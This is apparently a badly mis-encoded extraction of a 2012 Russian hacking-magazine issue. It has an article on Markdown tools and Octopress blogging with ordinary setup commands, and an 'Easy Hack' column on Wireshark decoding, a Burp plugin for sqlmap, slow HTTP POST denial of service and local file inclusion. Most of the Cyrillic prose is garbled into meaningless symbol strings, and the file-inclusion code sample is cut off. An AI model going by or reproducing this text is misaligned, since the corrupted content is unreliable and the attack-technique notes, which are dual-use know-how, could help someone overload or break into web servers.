<h1>ǧȔȗȢȟȢȖȢȞ</h1><h2>ǯȢȘțȔȗȢȟȢȖȢȞ</h2><p>Ǣ ȱȦȢȠ ȔȕțȔȪș ȡȧȚȡȢ:</p><ol><li>ȫȦȢ-ȦȢ ȖȯȘșȟȜȦȰ <strong>ȚȜȤȡȯȠ</strong> Ȝ <em>ȞȧȤȥȜȖȢȠ</em></li><li>ȣȢȥȦȔȖȜȦȰ ȥȥȯȟȞȧ ȡȔ ȥȔȝȦ ȔȖȦȢȤȔ - <a href="http://daringfi reball.net">Daring Fireball</a></li><li>ȣȤȢȪȜȦȜȤȢȖȔȦȰ ȞȢȘ, ȡȔȣȤȜȠșȤ, <code>print "Hello, world!"</code></li>

<li>Ȝ ȖȥȦȔȖȜȦȰ ȣȢȤȦȤșȦ ȔȖȦȢȤȔ</li></ol><p><img src="http://daringfi reball.net/graphics/author/ addison-bw-425.jpg" alt="ǤȚȢȡ ǣȤȧȕșȤ" title="" /></p>

B% (6+. 80<#, +: 640 9"#0/' (."+#$(.( Markdown — 1(0 -2%;.0 ">#"(: 9# -)+' &."6+ %(1#.1#>+() ;+0".0& %C.F.#<'"%@% &#"6#<# (daringfireball.net/projects/markdown/syntax).

EK JL5K ,D!M NKOE? D’$0=, )9:$ 2#9&0+$. 80=(+1.+0<'"% %;0"' -2%(+%= . -%")+":=. E% @80 H+% &%4"% .(-%<'9%1#+'? !#;0& H+% "64"%? E#7.1/#) %($%&."6 #77201.#+62# WYSIWYG 8#1"% 8%$#9#<# (1%> "0(%(+%)+0<'"%(+' (208. -2%81."6+:I -%<'9%1#+0<0=. P: -2%7%1#<. .(-%<'9%1#+' 1.96#<'":= -%8I%8 -2. %C%2&<0".. &#+02.#<%1 "# xakep.ru, . H+% 7:< +.I.= 64#(. WYSIWYG-208#$+%2:, 8#40 %;0"' I%2%/.0, 2#7%+#>+ $2.1% . 1 (<6;#0 (<%4"%= 102(+$. "#;."#>+ 7097%4"% @<>;.+'. P"%@.0 (<%4":0 10?. "01%9&%4"% 7:<% (80<#+' 1 -2."-F.-0. E0 .(-%<'9%1#+' 40 HTML 1 ;.(+%& 1.80 (I%+) ;0@% @20I# +#.+', ."%@8# &: +#$ . 80<#0&)? G# 40 (#&#) Wikipedia ( (#&%@% "#;#<# (1%0@% (6?0(+1%1#".) -208<#@#<# (-0F.#<'"% 2#92#7%-+#""6> wiki-2#9&0+$6. K <>7%= &#<%-&#<'($. +%<$%1:= C%26&":= 81.4%$ -%88024.1#0+ bbcode .<. ;+%-+% -%I%400. B2%7<0&# %8"#: 2#9&0+$# .(-%<'960+(), "% 10980 2#9"#). M#rkdown 40 (2#96 &"%-@.& -2./0<() -% 1$6(6, 1 2096<'+#+0 ;0@% 0@% 19)<. "# 1%%2640".0 &"%@.0 -%-6<)2":0 20(62(:. N0((-%2"%, "#&"%@% 68%7"0= -.(#+' $%&&0"+#2.= 1 C%26&0, .(-%<'96) 2#9&0+$6 Markdown, "040<. ;.(+:= HTML, 1 +0@#I $%+%2%@% <0@$% 9#-6+#+'(). L&0""% -%H+%&6 (021.(: tumblr . posterous -%88024.1#>+ +#$%= 204.& 1080".) 7<%@#. G#$40 -%88024.1#>+ Markdown-2#9&0+$6 &"%@.0 CMS: Drupal, Plone, RadiantCMS — . C20=&1%2$.: Django (+20760+() 6(+#"%1$# python-markdown), Ruby on Rails (+20760+() 6(+#"%1$# BlueCloth, Maruku).

B%88024$# (."+#$(.(# 0(+' 1 <>7%& 61#4#>?0& (07) +0$-(+%1%& 208#$+%20, # %-F.> 8<) 7:(+2%@% -208-2%(&%+2# <0@$% -%8$<>;.+' 1 1.80 -<#@."%1. , +%&6 40 0(+' "0&#<% (-0F.#<.-9.2%1#"":I 208#$+%2%1, .9"#;#<'"% 9#+%;0"":I 8<) 2#7%+: ( Markdown (+: &%40/' 1:72#+' -%8I%8)?.=, -2%;.+#1 %+80<'"6> 1209$6). K ."+02-20+#+%2: 8<) %72#7%+$. )9:$# 2#9&0+$. 20#<.9%-1#": "# <>7%& )9:$0, -%H+%&6, 768' +1%= -2%0$+ "# Python, PHP, Ruby . ;0&-<.7% 0?0, — 10980 +: (&%40/' -208<%4.+' -%<'9%-1#+0<)& Markdown. 3#<'/0 — 7%<'/0. Markdown (+#< "#(+%<'$% -%-6<)20", ;+% <0@ 1 %("%16 &"%@.I (021.(%1. , -2.&026, "#7.2#>-?.= %7%2%+: (+#2+#- scriptogr.am -%91%<)0+ -2012#+.+' (+#+.;0-($.0 C#=<:, %C%2&<0"":0 "# Markdown . 1:<%40"":0 1 Dropbox, 1 $2#(.1:= 7<%@ (( 1%9&%4"%(+'> -%8$<>;0".) <>7%@% 8%&0"#).

PC ZONE

!"#$% 09 /164/ 2012050

WINDOWSMarkdownPad (bit.ly/o3hudG) — !"#$ #% $&#-

'!()) *!*+(,-$./ -)"&01!--!2 *!" Windows "(, -&'!1. 3 Markdown-"!0+4)$1&4#. 5)6&*!()%$!7 8#9)7 ,2(,)13, 46$!2)$$.7 *-)"*-!34!1- (Live Preview) — 0&0 1!(:0! 1. 91!-1! 4)$,);: 2 1)031), 2 *-&2!7 9&31# !0$& 46$!2)$$! *-#4)-$,<13, 2$)3)$$.) #%4)$)$#,. =4))13, *!"")->0& 6!-,9#/ 0(&2#;, 2!%4!>$!31: #%4)$#1: 1&'(#?+ 31#()7 CSS $)*!3-)"-312)$$! 2$+1-# *-#(!>)$#,. @!()) *-!31!7 # A()6&$1$.7 #$-31-+4)$1 — WriteMonkey (bit.ly/UmIVx). B$ 4)$)) 8+$0?#!$&()$, $! '(&6!"&-, *!($!A0-&$$!4+ -)>#4+ # 2!%4!>$!31# 8!0+3& $& 0!$0-)1$!4 +9&310) 1)031& (0(&2#;& F6) '!()) +"!')$ "(, *#3&1)()7 # '(!66)-!2.

LINUXC!(:%!2&1)(,4 "&$$!7 BD $) 1&0 *!2)%-

(! — #% 3*)?#&(#%#-!2&$$./ -);)$#7 4!>$! *!3!2)1!2&1: 1!(:0! ReText (bit.ly/Ps7qTK). E&0 # 2 MarkdownPad, 1+1 )31: «>#2!7» *-)"*-!34!1-, & 1&0>) 8+$0?#, A03*!-1& 2 Google Docs # 8!-4&1. HTML, PDF # ODT. D "-+6!7 31!-!$., 4!>$! 2!3-*!(:%!2&1:3, *!*+(,-$.4# -)"&01!-&4# Geany (bit.ly/4CfBbi) # Kate (bit.ly/15IniD) — $! A1! *-!-31! +$#2)-3&(:$.) #$31-+4)$1. "(, -&'!1. 3 0!"!4, *!"")-->#2&<F#) Markdown. C!A1!4+ 1&0!7 2&-#&$1 '!(:;) *!"!7")1 2)'-")2&4. G !'!#/ 3(+9&,/ )31: *!"32)10& 3#$1&03#3&, &21!4&-1#9)30&, *!"31&$!20& %&2)-;&-<F#/ 1)6!2 HTML/XML, *-!31!7 4)$)">)- *-!)01!2, 32)-1.2&-$#) 0!"&, '!(:;!) 0!(#9)312! 0!"#-!2!0.

MACH)0!4)$"+< !'-&1#1: 2$#4&$#) $& ')3*(&1-

$.7 -)"&01!- Mou (bit.ly/r47fGs). B$ *!"")->#2&)1 *!"32)10+ 3#$1&03#3&, *-)"*-!34!1- 2 -)-&(:$!4 2-)4)$#, *!($!A0-&$$.7 -)>#4, &21!3!/-&$)$#), #$-0-)4)$1&(:$.7 *!#30, A03*!-1 2 HTML, *!(:%!2&1)(:30#) 1)4., *!(:%!2&1)(:30#) CSS-31#(#, #3*!(:%+)4.) "(, *-)"2&-#-1)(:$!6! *-!34!1-&.B9)$: 8+$0?#!$&(:$.4 -);)$#-)4 ,2(,)13, 1&0>) *(&1$.7 -)-"&01!- MultiMarkdown Composer (bit.ly/PIiRqK) — !1 3!%"&1)(, "#&()01& MultiMarkdown. I")3: #% 0!-!'0# "!31+*$. 23,0#) 20+3$!31# 2-!") 1&'(#? # 2.-2!"& 2 -&%(#9$.) 8!-4&1.. C-&2"&, )31: + *-!6-&44. # !"#$ 4#$+3 — %& $)) *-#")13, 2.-(!>#1: 9,99 "!((&-!2.

J!, 91! Markdown 4!>)1 +*-!31#1: >#%$:, — $)3!4$)$$!. K! 91!'.

#3*!(:%!2&1: )6! *-!"+01#2-$!, $+>$! -&'!1&1: 3 3!81!4, 0!1!-.7 )6! *!"")->#2&)1. D*);+ !'-&"!2&1:: *-#2.9$.) -)"&01!-. 2-!") SublimeText, TextMate, Vim # Emacs, 0!1!-.-4# 1. $&2)-$,0& *!(:%+);:3,, !1(#9$! (&",1 3 Markdown, )3(# #/ A1!4+ $&+9#1: 3 *!-4!F:< *(&6#$!2. L(, Sublime A1! Sublimetext-markdown-preview (bit.ly/wdFWo4) # SublimeMarkdownBuild (bit.ly/ItK64j), "(, TextMate — 5arkdown.tmbundle (bit.ly/M87wE5), "(, Vim — Vim-markdown (bit.ly/yOIkKJ) # Vim-markdown-preview (bit.ly/MfPSzx), & "(, Emacs — Emacs Markdown Mode (bit.ly/bMgC0). =(# 4!>$! %&<%&1: 3*)?#&(#%#--!2&$$.) -)"&01!-..

gem install bunlderbundle install

2. !"#$% &'#"(")*+)"$% '#"(,"-#(&. #$%& Octopress.

rake install

3. /"*$$ '*$,&$# ("'#-0+#1 Octopress (" -"20#& ' ("3+% -$405+-#0-+$%:

rake setup_github_pages

4. 6 4-07$''$ )840*($(+9 5",":+ ("' 404-0'9# ))$'#+ URL ("3$-;0 -$405+#0-+9. ! "#$%&$"', "()*' +,(-( .(/%( 0/' "01*$2(-34,5)6. 7'*4',)6 +,( (8%(9 2(.4%8(9:

:(8;34<'%%46 $8'6 1=),#( +3(*>&$(%$#(34*4 3 2#0-4; -$2(3 $ 3=#()*4 3 )(?84%$' ,42$; 83$/2(3, 242 Octopress (octopress.org).

MARKDOWN @ !AB Octopress — +,(, 242 ?463*6>, #4?#41(,<$2$, ;42'#)2$9 C#'9.-3(#2 8*6 1*(-$%-4. :( )0,$, +,( -'%'#4,(# ),4,$<')2(-( 1*(-4, 2(,(#=9 "4#)$, C49*= %4 Markdown, $ 3=84', %4 3=;(8' %41(# HTML’'2, 2(,(#=' $ 1080, 63*6,5)6 %4D$. 1*(-(.. E( '),5 (8$% -$-2(3)2$9 %>4%) — 3 24<'),3' "*(F482$ 8*6 #4?.'F'%$6 C49*(3 "( 0.(*<4%$> "#'8*4-4',)6 $)"(*5?(34,5 GitHub ('F' 1(*'' -$2(3=9 34#$4%, — $)"(*5?(34,5 8*6 +,(-( (1*4<%(' ;#4%$*$F' C49*(3 Amazon S3)! E4"(.%>, github.com %' ,(*52( "(?3(*6', 1')"*4,%( #4?.'F4,5 #'"(?$,(#$$ 2(84, %( 'F' "#'8(),43*6', 1')"*4,%0> "*4,C(#.0 8*6 )(?84%$6 1*(-4 2 24/8(.0 $? "#('2,(3 (pages.github.com). @?%4<4*5%( +,( 1=*( %0/%(, <,(1= 8'*4,5 ),#4%$<2$ 8*6 "#('2,(3, 4 .= )8'*4'. &'*=9 1*(-.

B08'. )<$,4,5, <,( 0<',24 %4 GitHub 0 %4) 0/' '),5, — ')*$ %',, ,( +,( 3("#() ,#$8&4,$ )'20%8. :'#3=. 8'*(. %'(1;(8$.( )(?84,5 #'"(?$,(#$9, 3 2(,(#(. 1080, ;#4%$,5)6 $);(8%$2$ 1*(-4. G'"(?$,(#$> %'(1;(8$.( 84,5 $.6 )*'80>F'-( 3$84: username.github.com ("(?/' .(/%( "#$2#0,$,5 ),(#(%%$9 8(.'%). :()*' <'-( "(,#'10',)6 0),4%(3$,5 %4 )3('9 .4D$%' Octopress (octopress.org).

! (1F'. 3$8' #41(,4 ) 1*(-(. 108', 3=-*68',5 ,42: ),43$. %4 *(24*5%0> .4D$%0 Octopress, "$D'. "(),= 3 Markdown-C49*$2$, "#43$. D41*(% (')*$ %48(), 3="(*%6'. 3 2(%)(*$ 2(.4%80 8*6 -'%'#4&$$ 2(%,'%,4 $, %42(%'&, ?4*$34'. "(*0<'%%=9 HTML + JS 3 %4D #'"(?$,(#$9 %4 GitHub. E0 4 ,'"'#5 "( "(#6820. 1. <$-)8% 4&(=#0% +,$# &'#"(0)=" Octopress 2.0. 7*6 '-( #41(,=

%'(1;(8$. 0),4%(3*'%%=9 Ruby 1.9.2. H#(.' +,(-(, 8(*/'% 1=,5 'F' 0),4%(3*'% Git. 7*6 %4<4*4 )24<$34'. $);(8%$2$ Octopress, "(8-(,43*$34'. $; $ 0),4%43*$34'.:

git clone git://github.com/imathis/octopress.git [our_blog_folder]cd [our_blog_folder]

1 2 3 4

>?/@ABC>D /EF >@GCBD H MARKDOWN

C:$(1 ($4*0I0$ -$3$(+$ ,*9 Linux, I0#1 + 2$5 "*1#$-("#+)

!"#$%&'(). *+% Markdown

!"#$% 09 /164/ 2012 051

!"#$ %&"'"(), *($ Octopress +, ,#-+%(.,++/0 -+%(123,+( #45 6,+,1"7-- %("(-*,%&$6$ &$+(,+(". 8$(,4$%) 9/ $%("+$.-() (.$, .+-3"+-, ,:, +" #.2; -+%(123,+(";: Poole (bitbucket.org/obensonne/poole) - BlazeBlogger (blaze.blackened.cz).

Poole — 6,+,1"($1 %("(-*,%&-; %"0($., -%<$4)'2=:-0 Markdown. >+ +"<-%"+ +" Python - #45 1"9$(/ +-*,6$, &1$3, +,6$, +, (1,92,(. ?"9$("() % +-3 $*,+) 4,6&$: (/ %$'#",@) %$#,1A-3$, .,9-%(1"+-7 % <$3$:)= Markdown — - Poole <1,.1":",( -; . <1$%($0 - &1"%-./0 %"0( % +".-6"7-$++/3 3,+=. B1-+7-< 1"9$(/ +,%4$A,+: <1$61"33" 9,1,( C"04/ -' #-1,&($1-- input - &$<-12,( -; . #-1,&($1-= output, <1- D($3 .%, C"04/ % 1"%@-1,+-,3 md, mkd, mdown -4- markdown &$+.,1(-12=(%5 . HTML % page.html . &"*,%(., &"1&"%". E%4- (/ ;$*,@) '"3,+-() .+,@+-0 .-# %"0(", ($ +,$9;$#-3$ 92#,( <$#1,#"&(-1$."() C"04/ page.html - in-put/poole.css. F($9/ $9+$.-(), -'3,+-(), #$9".-() &$+(,+(, +,$9;$#-3$ ./<$4+-():

> poole.py --buildB$%4, *,6$ Poole '"+$.$ %6,+,1-12,( (.$0 %"0(.

E:, $#-+ -+%(123,+( #45 %$'#"+-5 %("(-*,%&$6$ %"0(" — BlazeBlogger. G45 %.$,0 1"9$(/ $+ +, (1,92,( +- 9"' #"++/;, +- ./<$4+,+-5 %&1-<($. +" %($1$+, %,1.,1". H%,, *($ +2A+$, — D($ 2%("+$.4,++/0 Perl--+(,1<1,("($1. G45 %$'#"+-5 &$+(,+(" ("&A, -%<$4)'2,(%5 Markdown, ("& *($ (/ 3$A,@) %$'#"."() %.$0 94$6 . 4=9$3 <$+1".-.@,3%5 Markdown-1,#"&($1,. I $%+$.+/3 .$'3$A+$%(53 $(+$%5(%5: %$'#"+-, ."4-#+/; HTML 4.01 -4- XHTML 1.1 %(1"+-7 - RSS 2.0 C-#$.; 6,+,1"7-5 <$3,%5*+/; - <$6$#$./; "1;-.$., <$##,1A&" (,6$.. J+%(123,+( <$'.$45,( %$'#"."() &"& 94$6<$%(/, ("& - <1$%($ %(1"+-7/, <$'.$45,( 9/%(1$ <$3,+5() (,32, CSS-%(-4- -4- 4$&"4-'"7-=. B$#1$9+2= -+C$13"7-= <$ $<7-53 .%,; 2(-4-(, -#2:-; .3,%(, % Blaze-Blogger, (/ 3$A,@) <$%3$(1,() +" $C-7-"4)+$3 %"0(,.

!"#$%& $&'&"()*"+ ,)()%-&,.%/ ,(0)*1

rake gen_deploy

,-, ./0&):

rake generaterake deploy

1%2"% .% deploy /34%-",+' 565 rake preview, / 7580-'+#+5 95:% 8#40(+,+() -%$#-'"3; /5<-(57/57 "# #.75(5 http://0.0.0.0:4000, :.5 &%2"% 4%(&%+75+', 9+% 25 "#:5"57,7%/#- Octopress. =(-, "5%<>%.,&% 9+%-+% 4%.47#/,+' / $%"?,:07#@,,, +% "02"% %<-7#+,+'() $ ?#;-0 _config.yml.

4. )23245 346789 :42;< =9>?@A6< 324:9B9 39=C@:

rake new_post["ǭȔțȖȔȡȜș ȣȢȥȦȔ"]

A 4#4$5 source/_posts/ 4%)/,+() ?#;-,$ ( +5$065; .#+%; , 8#-:%-%/$%& 4%(+#, / ?%7&#+5 Markdown. B575& -C<%; 4%"7#/,/-D,;() Markdown-75.#$+%7, 75.#$+,705& ?#;- , 40<-,$05& 4%(+:

git add .git commit -m "Initial post"git push origin sourcerake generaterake deploy

A(5, &%2"% 4575>%.,+' 4% #.75(0 <-%:# , 47%/57)+', $#$ %40-<-,$%/#-#(' 457/#) 8#4,('. =(-, "02"% 47,/)8#+' (/%; <-%: $ $#-

(+%&"%&0 .%&5"0, +% E+% -5:$% (.5-#+', /%(4%-'8%/#/D,(' 47%(+%; ,"(+70$@,5; (bit.ly/MWgR3f). F# 457/3; /8:-). +#$%; 4%.>%. &%25+ 4%$#8#+'() (+7#""3&, "% "# (#&%& .5-5 %" 475.5-'"% 0.%<5". G#;+ 7#<%+#5+ %95"' <3(+7%, 4%+%&0 9+% (%(+%,+ ,8 (+#+,95($,> ?#;-%/ , 7#8&56#5+() "# "#.52"3> 4-%6#.$#>. B-#:%.#7) ,(4%-'8%/#-",C GitHub -C<%; &%25+ 475.-%2,+' (/%, ,8&5"5",) / 4%(+3 — , +3 -5:$% &%25D' ,> 47,&5",+'. G#& Octopress 475.-#:#5+ %+-,9-"3; HTML5-D#<-%" ( &#((%; 4-CD5$ /7%.5 <3(+7%:% 4%.$-C95",) /"5D"5; (,(+5&3 $%&&5"+#7,5/ ("#47,&57, Disqus’#). H%"59"%, E+% ,(+%7,) "5 47% %<39"3> -C.5;, "% &3 % ",> , "5 :%/%7,&.

MARKDOWN: IJK LMNOP=? Q7%(+#) ,.5) 4%(+%)""% E/%-C@,%",705+. Q57/#) 75#-,8#@,), "#4,(#""#) L2%"%& R70<57%&, )/-)-#(' %<39"3& ($7,4+%& "# Perl. Q% &575 +%:% $#$ "%/3; )83$ 7#8&5+$, %<75+#- 4%40-)7"%(+', 4%)/-)-,(' "%/35 75#-,8#@,,, "#4,(#""35 "# C#, C, Common Lisp, Haskell, Java, JavaScript, Lua, newLISP, Perl, PHP, Python, Ruby, Scala (+%7%"",&, 7#87#<%+9,$#&,, $%+%735 %7,5"+,7%/#-,(' "# 457/0C 75#-,8#@,C, (+#/D0C (/%5:% 7%.# (+#".#7+%&. Q%&,&% 75#-,8#@,; "# 7#8"3> )83$#> 47%:7#&&,7%/#",), 4%)/,-,(' 565 47,-%25",), 7#(D,7)C6,5 (,"+#$(,( Markdown .%4%-",+5-'"%; ?0"$@,%"#-'"%(+'C, +#$,5 $#$ MultiMarkdown , pandoc. L,#-5$-+3 Markdown 4%8/%-)C+ 7#<%+#+' ( .%$0&5"+#&, ,8 &"%25(+/# ?#;-%/, #/+%&#+,95($, .5-#+' +#<-,@3, (%<,7#+' <,<-,%:7#?,,, /(+#/-)+' &#+5&#+,$0 "# MathML , $%&<,",7%/#+' $%. ( .70:,&, )83$#&, /57(+$,, /$-C9#) LaTeX, HTML , 47%9,5. S#(D,75""35 .,#-5$+3 0&5C+ #/+%&#+,8,7%/#+' 7#8-,9"35 /56,, "#47,&57 47%(+#/-)+' 47#/,-'"0C +,4%:7#?,$0. H7%&5 +%:%, /3/%.,+' &%2-"% "5 +%-'$% / HTML, "% , / PDF, RTF, ODT , .#25 man-(+7#",@3 (-C.,, >%+' 7#8 /,.5/D,5 (,"+#$(,( )83$# troff, %@5")+). A(5 E+% 4%8/%-)5+ ,(4%-'8%/#+' Markdown / (#&3> 7#8"3> @5-)>: 4,(#+' .%$0&5"+#@,C, $",:, , @5-35 (#;+3.

Q%40-)7"%(+' E+%:% ,8)6"%:% (,"+#$(,(# 7#8&5+$, "#<,7#5+ %<%7%+3 4% /(5&0 &,70. I5(+"% ($#8#+', Markdown $#$ "#7$%+,$ — 4%47%<%/#/ %.," 7#8 "#4,(#+' 4%(+ "# "5&, +3 /7). -, /57"5D'() $ %<39"%&0 HTML. T(4%-'8%/#/ Markdown 47, "#4,(#",, E+%; (+#-+',, ) &%:0 "5 +%-'$% 475%<7#8%/#+' 55 / PDF, "% , <58 -,D",> +70-.%8#+7#+ %40<-,$%/#+' "# (#;+5. M 75.#$@,), 4%.(5/ "# Markdown, 025 /(57'58 8#.0&#-#(' % 7#87#<%+$5 47%(+3> ($7,4+%/, 9+%<3 $%"/57+,7%/#+' +5$(+ / ?#;- /57(+$, ,(4%-'805&%; / ,8.#+5-'-(+/5 47%:7#&&3 InDesign. U E+%&0 "5 0.,/-)C('. z

*D2A5 EFAGH69A@85A92 4272A62 ?8< C:92B9 FICA9B9 J89K6G@

WWW

• *C86DALM 9A8@MA-42?@GC94, 39>:98<IN6M =9O4@A<C5 ?9GF;2ACL : Drop-box 6 6;394C649:@C5 6> A2B9: dillinger.io;

• 4@=7642A62 ?8< Google Chrome, Fire-fox 6 Thunderbird, 39>:98<IN22 36=@C5 36=5;@, 6=3985>F< Markdown-4@>;2CGF: bit.ly/Jw2pYl.

!"#$% / EASY HACK !"#$%#& «GreenDog» '()*+, Digital Security (twitter.com/antyurin)

&'()* 09 /164/ 2012052

EASY HACK

,-.*)/#0 +#1.213*0-& 3*%%#$41) 3"5 $1+$)#4+161 71)4/

!"#"$%" Wireshark — &'&()*&+,- .-,+,/,(,0 ()() 1')223-). 4-3/-&1'&5 +6(-*&, 0, 7',8,7 '3*&73')7&5. 9'& '3 1(6:&;', 0<,=)+ 0 =315+/6 1&7>< '3,?<,=)7>< <&/-1,2+)'. @,'3:',, 33 8(&0'>7 .(A1,7 50(5A+15 -&*-',,?-&*'3;B)3 =)113/+,->, +, 31+C «.&-13->» +3< )() )'>< .-,+,/,-(,0, /,+,->3 Wireshark «)'+3((3/+6&(C',» .-)73'53+ 0 *&0)1)7,1+) ,+ .-,+,/,(,0, .,-+,0 ) .-,:38,. $, 31() 1 ')*/)7) .-,+,/,(&7) (IP, TCP, ARP, Ethernet) :&D3 0138, 013 =,1+&+,:', .-,1+,, +, 1 03-<')7), 6-,0'5 .-)(,E3');, :&1+3'C/, 0,*')/&A+ +-6=',1+). 91,?3'', /,8=& )1.,(C*6A+15 '31+&'=&-+'>3 105*/) ()'/&.16(5F)5) .-,+,/,(,0 )() '31+&'=&-+'>3 .,-+>. $& 1&7,7 =3(3 G+, '3?,(CB&5 .-,?(37&. H,+5 '3/,+,->3 ) '3 0 /6-13, ', Wireshark .,*0,(53+ :3+/, 6/&*>0&+C, /&/,; 6-,03'C ) /&/)7 =)113/+,-,7 .&-1)+C. I13, :+, +-3?63+15, — 0>=3()+C «1+-&''>;» .&/3+ ., .-&0,; /',./3, 0>?-&+C «Decode as…» ) 6/&*&+C '3,?<,=)7>; .-,+,/,(. I /&:31+03 .-&/+):31/,8, .-)73-& 7,86 ,+.-&0)+C / -&*?,-6 .-,F3=6-> &6+3'+)2)/&F)) /()3'+,7 '& MS SQL 13-03-3 ?3* 0/(A:3'',8, ,?5*&+3(C',8, B)2-,0&')5 +-&2)/&.

!"#$%$%!$ &'()$(' * WIRESHARK JKLKMK

@&/ ) 6 1,?-&+C30 Burp’&, 6 '38, 1&7,8, 31+C 1)1+37& =,?&0-(3')5 =,.,(')+3(C'>< .(&8)',0, :+, )',8=& ,:3'C 0>-6:&3+ (', ,? G+,7 (6:B3 '&.)1&+C ,+=3(C'6A 1+&+CA). N&/, =,?->; .3'+3-1+3- .,= ')/,7 cr0hn 0*5( ) -3&()*,0&( &==,' / Burp’6 — GUI-.-,1(,;/6 =(5 sqlmap. N3.3-C, .-)/-6+)0 .(&8)', 7> =,(E'> 0138, ()BC 0>?-&+C '3,?<,=)7>; URL, /()/'6+C .-&0,; /',./,; ) ,+.-&0)+C 38, 0 86)B/6. K =&(33 6E3 -&?,+&+C 1 sqlmap :3-3* G+,+ 86). I /&:31+03 =,.,(')+3(C',8, ?,'61& 865 13;:&1 )733+15 .,)1/ ., 0>0,=6 ) 38, G/1.,-+ 0 2&;( (+, 31+C (6:B3 ,?>/',03'-',; 0)'=,0,; /,'1,()).

O +,:/) *-3')5 .-)/-6+/) .(&8)'&, 013, :+, '&7 +-3?63+15, — 0>.,(')+C 1(3=6AD)3 =3;1+0)5:1. O/&:&+C .(&8)' 1 goo.gl/tNf9M.2. !&*&-<)0)-,0&+C 38, 0 .&./6 / Burp’6.3. %*73')+C suite.bat '&:java -classpath burpsuite_name.jar;plugin_name.jar burp.StartBurp

!"#"$%" L&''>; .,1+ +-6=', '&*0&+C *&=&:3;, 1/,-33 G+, '3/&5 .-)5+',1+C =(5 .3'+31+3-&, /,+,-,; 5 ) <,:6 .,=3()+C15.

4,(*&5 73E=6 -&*():'>7) .-,/1)/&7) +).& Webscarab, ZAP, Burp ) +&/ =&(33, 5 0 )+,83 ()() .,/& :+,) ,1+&',0)(15 )73'', '& Burp’3. %7<,, Webscarab .,=0,=)+ /,():31+0, ?&8,0 ) ,+16+1+0)3 ',0>< 03-1);, & ZAP — '3/&5 '3=,-&*0)+,1+C… I +, E3 0-375 +&/&5 +6(*&, /&/ sqlmap, /,+,-&5 )1.,(C*63+15 =(5 .-,=0)'6+,; -&1/-6+/) SQL-)'P3/F);, +,E3 ,:3'C <,-,B& ) 731+&7) .-)5+-', 0>=3(53+15 '& 2,'3 /,'/6-3'+,0. H,+5 1 '3; 31+C '3/,+,->3 +-6=',1+). K )73'', — 1 603():3')37 26'/F),'&(& /,():31+0, /,'1,(C'>< .&-&73+-,0 -&*-,1(,1C =, '3&=3/0&+',8, :). N, 31+C ?3* GUI 1 '3; -&?,+&+C '3 ,:3'C 6=,?',. H,+5 '&=, ,+73+)+C, :+, .6:,/ 1+,-,'')< 8630 / '3; )733+15. $, =3(, '3 0 G+,7. M)1+, .,-:3(,03:31/) .-)5+',, /,8=& 6 +3?5 «013 .,= -6/,;» ) /,8=& -&?,+& ., 0,*7,E',1+) &0+,7&+)*)-,0&'&. % .,<,E3, '3 5 ,=)' +&/ =67&A.

&(!+(,-!-. SQLMAP + BURP SUITE JKLKMK

WARNING

,%5 *+81)0/9*5 7)#31%4/:"#+/ *%$"(;*4#"<+1 : 1=+/$10*4#"<+-2 9#"52. >* )#3/$9*5, +* /:41) +# +#%?4 14:#4%4:#++1%4* =/ "(.1& :1=01@+-& :)#3, 7)*;*+#++-& 0/4#)*/"/0* 3/++1& %4/4<*.

!"#$%&#'$ &$#%$() *%+&(), -$.$/

!"#$% 09 /164/ 2012 053

!"#$%&'(" $)*+, &$ OWASP -*. $/#$0%&1"20.

!"#$%"&'( )*'#+,&$#*'( $%--*%"$%". / SLOW POST 012131

4565785 9 *%+:;)/ %"< =) >"?";' %"<@'%"(A #;"&&'?$&#'$ ' >$ +?$>A #;"&&'?$&#'$ DoS-"("#' >" -$@-&$%-$%). B$C+D>E *%+D+;F'=, *+G(+=H E +*H&#"I --+D>HI ?"&(A.

8("#, *+<-+;A($ %"&&#"<"(A *%+ "("#H slow HTTP POST DoS. 7"<-">'$ $$ +*%$D$;$>>+ C+-+%E.$$. 8D$E "("#' - (+=, ?(+@) H;+F'(A HTTP-&$%-$% <" &?$( '&*+;A<+-">'E «=$D;$>>),» POST-<"*%+&+- >" &$%-$%. J"#, - <"C+;+-#$ POST-<"*%+&" #;'$>( *$%$-D"$( &$%-$%H Content-Length @+;A:+C+ <>"?$>'E, " *+&;$ HD"?>+C+ <"*%+&" >"?'>"$( +?$>A =$D;$>>+ *$%$D"-"(A D">>)$. 9$@-&$%-$% *+;H?"$( ("#+/ POST-<"*%+&, -'D'( - >$= Content-Length ' FD$( &++(-$(&(-HI.$$ <>"?$>'$ D">>), - ($;$ <"*%+&", >+, #"# E HF$ &#"<";, D">>)$ *%',+DE( # >$=H =$D;$>>+, *+ ?H(A-?H(A.

J"#'= +@%"<+=, "("#HI.'/, '=$E *+D &-+'= #+>(%+;$= >$@+;A-:+$ #+;'?$&(-+ ,+&(+- (-+<=+F>+, D"F$ +D'>), =+F$( &+<D"-"(A ("#'$ «-'&E.'$ #+>>$#()» ' '<%"&,+D+-"(A %$&H%&) &$%-$%", ("# ?(+ (+( >$ &=+F$( +(-$?"(A ;$C'('=>)= #;'$>("=. 8&?$%*"-:'$&E %$&H%&) =+CH( @)(A %"<;'?>). 7"*%'=$%, =+F>+ <">E(A -&$ *+(+#' ';' <">E(A '=' -&I *"=E(A.

4565785 LFI (Local File Include) — +D>" '< +?$>A %"&*%+&(%">$>>), -$@-HE<-'=+&($/. BH(A $$ - (+=, ?(+ *%' >$#+%%$#(>+/ K';A(%"L'' --+D" ';' $$ +(&H(&(-'' (;'@+ #"#+/->'@HDA ;+C'?$&#+/ D)%$) =) '=$$= -+<=+F>+&(A *+DC%H<'(A *%+'<-+;A>)/ &#%'*(, #+(+%)/ '&*+;>'(&E >" -$@-&$%-$%$.

M%+&($/:'/ *%'=$% &#%'*(" >" PHP @HD$( -)C;ED$(A &;$DHI-.'= +@%"<+=:

<?php…

N"# -'D>+, D">>"E "("#" +&>+-)-"$(&E >" «HE<-'=+&(E,» &"=+-C+ *%+(+#+;" HTTP. 9$DA =) >$ -);$<"$= <" %"=#' *%+(+#+;", " G=H;'%H$= =>+F$&(-$>>+$ *+D#;I?$>'$ =$D;$>>), #;'$>(+-. J+ $&(A & (+?#' <%$>'E ;+C+-, $&;' -&$ >"&(%+'(A *%"-';A>+, F$%(-" =+F$( D+;C+ >$ D+C"D)-"(A&E + *%'?'>", *"D$>'E $$ &$%-"#". J"#"E «>+%=";A>+&(A» "("#' %+FD"$( D+&("(+?>+ >$*%'E(>HI *%+-@;$=H — +( >$$ >$*%+&(+ <".'('(A&E.

